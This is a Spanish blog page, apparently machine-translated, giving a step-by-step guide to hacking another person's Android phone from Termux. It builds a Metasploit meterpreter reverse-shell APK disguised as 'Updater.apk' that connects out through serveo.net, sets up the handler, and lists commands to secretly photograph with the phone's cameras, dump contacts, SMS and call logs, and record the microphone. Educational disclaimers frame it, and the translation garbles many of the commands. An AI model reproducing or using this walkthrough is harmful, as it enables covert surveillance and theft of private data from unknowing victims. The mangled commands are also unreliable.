NOTA IMPORTANTE: El delito informático está severamente castigado por la ley. Esta página no promueve el delito informático, es divulgativa y muestra los mecanismos que utilizan los cibercriminales para poder identificar el ataque si has sido victima de uno de ellos. En el caso de que hayas sido victima de un ataque te recomendamos que busques recursos legales en la sección Cibercrime Law o en la página del Instituto Nacional de Ciberseguridad: https://www.incibe.es/

BlogWonderHowTo

Cómo: HACKEAR un dispositivo Android con TermuX en Android | Parte # 1 – Por Internet [Ultimate Guide]

LO SENTIMOS, ESTA PÁGINA WEB YA ESTÁ (Casi) CERRADA … !!!

  • Nota: – Este hilo ahora está CERRADO por H4ck3R_777 (el administrador) debido a la violación de nuestros Términos. Me informaron que muchos ataques a teléfonos móviles de varias personas se realizan utilizando mi información como guía básica. Nunca invadimos la privacidad de las personas y no queremos que lo hagan otras personas, especialmente utilizando nuestra Información y Técnicas. Eso es Y, he decidido cerrar ESTA guía PERMANENTEMENTE! (Capturas de pantalla, requisitos, títulos, comandos y problemas: la sección R no se eliminará)
  • ¡Todos los grupos están ahora estrictamente vigilados por nuestros administradores responsables y genios!

Requisitos

1). Android 5.0 (el tutorial para Android inferior a 5.0 está AQUÍ)

2). Aplicación TermuX para Android (descárguela de Tienda de juegos

3). Metasploit Framework instalado en TermuX (Tutorial aquí)

4). Conexión activa a Internet / WiFi

5). Se debe permitir que TermuX use almacenamiento externo (para esto, ingrese este comando solo a la vez: “termux-setup-storage”)

6). MiXplorer (para firmar el archivo APK, descárguelo de Sitio web UpToDown)

7). MiX Signer (APK Signer para MiXplorer, descárguelo de Tienda de juegos)

8). (Uso recomendado Teclado de hacker para ingresar comandos en TermuX fácilmente.

Paso 1: reenvío de puertos

paquete instalar openssh

– Instalará con éxito OpenSSH

ssh -R (Puerto_deseado): localhost: (Puerto_deseado) serveo.net

– Detalle a continuación
  • (Opcional) Nombre esta sesión: Reenvío de puertos

Paso 2: Creación de un archivo APK con carga útil incorporada

msfvenom -p android / meterpreter / reverse_tcp LHOST = serveo.net LPORT = 4564 R> almacenamiento / descargas / Updater.apk

– El enlace para Updater.apk está en el próximo tercer párrafo

Paso 3: firma del archivo APK recién generado

  • Pulsación larga en “Archivo APK sin firmar (Updater.apk)“y seleccione”Botón de menú“en la esquina superior derecha de MiXplorer, luego seleccione”SEÑAL“.

Paso 4: Configurar Metasploit en TermuX

  • Active Metasploit Framework en TermuX ingresando este comando en una nueva sesión:

msfconsole

– Consola de Metasploit Framework

mkdir -p $ PREFIX / var / lib / postgresql
initdb $ PREFIX / var / lib / postgresql
pg_ctl -D $ PREFIX / var / lib / postgresql start

– ¡¡¡Gracias a DUST WORLD, por esta solución … !!!

msf> usar exploit / multi / handler
msf> establecer carga útil android / meterpreter / reverse_tcp
msf> establecer LHOST localhost
msf> establecer LPORT 4564
msf> explotar -j -z

– Ingrese solo comandos EN NEGRITA

Paso 5: Instalar APK en el dispositivo Android de la víctima

sesiones -i (ID de sesión)

– (ID de sesión) = 1, 2, 3, 4 o 5 …
  • BINGO…….!!!!!!!! Has pirateado con éxito el dispositivo Android de tu víctima

!!! … ¿Necesitas ayuda para hackear … ???

Puede ingresar: {meterpreter> ayuda} comando, para todos los comandos disponibles, aquí, he simplificado algunos comandos para usted.

  • Tomando instantáneas sigilosas desde la cámara frontal

Simplemente ingrese este comando para esto:

webcam_snap -i 2 -p almacenamiento / descargas / X-Stealth-Snapshot-F.jpg

Aquí, en este comando, 2 representa la cámara frontal. Para la cámara trasera, debes usar 1.

Su instantánea de Stealth se puede encontrar aquí: (Almacenamiento de escritura predeterminado) -> descargas -> X-Stealth-Snapshot-F.jpg

  • Tomando instantáneas sigilosas desde la cámara trasera

Al igual que el anterior, pero esta vez usaremos 1,

webcam_snap -i 1 -p almacenamiento / descargas / X-Stealth-Snapshot-R.jpg

Su instantánea de Stealth se puede encontrar aquí: (Almacenamiento de escritura predeterminado) -> descargas -> X-Stealth-Snapshot-R.jpg

Para buscar contactos, simplemente ingrese este comando:

dump_contacts -o almacenamiento / descargas / X-Contacts.txt

Los contactos se guardarán en: (Almacenamiento de escritura predeterminado) -> descargas -> X-Contacts.txt

Como arriba

dump_sms -o almacenamiento / descargas / X-SMS.txt

Todos los SMS se guardarán en: (Almacenamiento de escritura predeterminado) -> descargas -> X-SMS.txt

Solo ingrese esto:

dump_calllog -o almacenamiento / descargas / X-CallLog.txt

El registro de llamadas se guardará en: (Almacenamiento de escritura predeterminado) -> descargas -> X-CallLog.txt

  • Espiar a través del micrófono

Aquí, debe editar la duración del micrófono de grabación (predeterminado: 1 s). El comando para la grabación de 10 segundos es este:

record_mic -d 10 -f almacenamiento / descargas / X-Spy-Record.mp3

La grabación espía se guardará en: (Almacenamiento de escritura predeterminado) -> descargas -> X-Spy-Record.mp3

???…Problemas comunes…???

  • Metasploit no se ejecuta en TermuX

Esto podría suceder si hace algo mal al instalar TermuX en Android. Si ve un error como GEMS no encontrado, o cualquier error de este tipo, simplemente elimine TermuX con sus datos y vuelva a instalarlo.

  • msfvenom / msfconsole: comando no encontrado!

Hay dos posibles razones para ese error.

1). Metasploit no está instalado correctamente en TermuX. Por eso, no pudo crear un acceso directo de comando. Para solucionar este problema, desinstale TermuX, con Data. Luego reinstale TermuX y repita todo el método nuevamente. En realidad, se trata de un error de secuencia de comandos. ¡También enfrenté este problema la primera vez que instalé Metasploit en TermuX!

2). Metasploit se instaló correctamente, pero no pudo crear el acceso directo. Para administrar esto, solo ingrese:

Simplemente abra una nueva sesión y vaya al directorio metasploit-framework, e ingrese el comando ./msfconsole, así (lo mismo para msfvenom):

cd metasploit-framework
./msfconsole
O
./msfvenom

– El primer comando tomará U 2 en el directorio de MSF, y el segundo 1 es 2 para iniciar MSF.

2). Método de acceso directo

Aquellas personas que no estén satisfechas con el primero y quieran crear un comando de acceso directo, como el resto de programas, ingresan los siguientes comandos uno por uno en una nueva sesión (msfvenom incluido):

ln -s /data/data/com.termux/files/home/metasploit-framework/msfconsole
mv msfconsole $ PREFIX / bin

ln -s /data/data/com.termux/files/home/metasploit-framework/msfvenom
mv msfvenom $ PREFIX / bin

– Este proceso también se llama Symlinking. [Updated]

3). ¿¡Todavía no has tenido suerte (con msfvenom) !? , He subido Updater.apk con la configuración predeterminada (LHOST = serveo.net, LPORT = 4564). Descárgalo desde allí.

  • ¿Por qué usamos serveo.net …?

Como dije antes, NGROK no proporciona un Dominio y un Puerto fijos. Por lo tanto, debe generar un nuevo archivo APK, cuando planea piratear un teléfono, pirateó antes. Vea lo que dice serveo sobre NGROK:

  • ¿Por qué usamos MiXplorer para firmar el archivo APK …?

En realidad, no hay Otro forma de firmar el archivo APK en Android. De lo contrario, debe firmar el archivo de la aplicación en su PC (especialmente en Kali LinuX). MiXplorer es la excelente manera de firmar el archivo APK, directamente en Android.

  • Error de Metasploit: no se pudo conectar a la base de datos

No te preocupes por eso. Ya hemos creado una solución para esto :). Creo que se ha dado cuenta antes, que estaba usando “localhost”, en lugar de 127.0.0.1 o ::: 0: 1, como HOST. En realidad, el comando “localhost” lo conecta automáticamente con el host local disponible, sin importar si es 127.0.0.1 o ::: 0.1 o de otro modo.

Pero si aún desea solucionarlo, ingrese los siguientes comandos en Nueva sesión de TermuX con cuidado:

mkdir -p $ PREFIX / var / lib / postgresql
initdb $ PREFIX / var / lib / postgresql
pg_ctl -D $ PREFIX / var / lib / postgresql start

– Gracias a Dusty World por este FIX
  • ¿Qué teléfono Android es mejor para los propósitos de H4ck1nG …?

1). Los teléfonos / tabletas Google NeXuS son excelentes para fines de piratería informática. Como, son completamente compatibles con Kali NetHunter. NetHunter incluye todas las herramientas de piratería y funciona como Android / Windows en una tableta.

2). Pero si hablamos de Android, muchos H4ck3R dicen que Samsung Galaxy S5 es excelente para propósitos de Ha4ck1nG. Tiene una buena versión de Android (alrededor de 5.0), también es totalmente compatible con la aplicación TermuX.

Nota:-

Esta información es sólo con fines educativos. No seré responsable de ningún uso negativo o ilegal de esta información. Además, si te enfrentas a algún tipo de error, o crees que me he perdido algo, dímelo en la sección de comentarios. Encontraré la solución adecuada para eso. De todos modos, solo usa estos trucos para DIVERTIRTE … no para hacer trabajo ilegal. Todos somos H4ck3R éticos y nunca invadimos la privacidad de las personas.

De todos modos, gracias por leer mi hilo (también puedes unirte a nuestro Grupo de WhatsApp para obtener más información y guías). LA MEJOR DE LAS SUERTES …!

| ==============> H4ck3R _777 <============== |

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba
Cerrar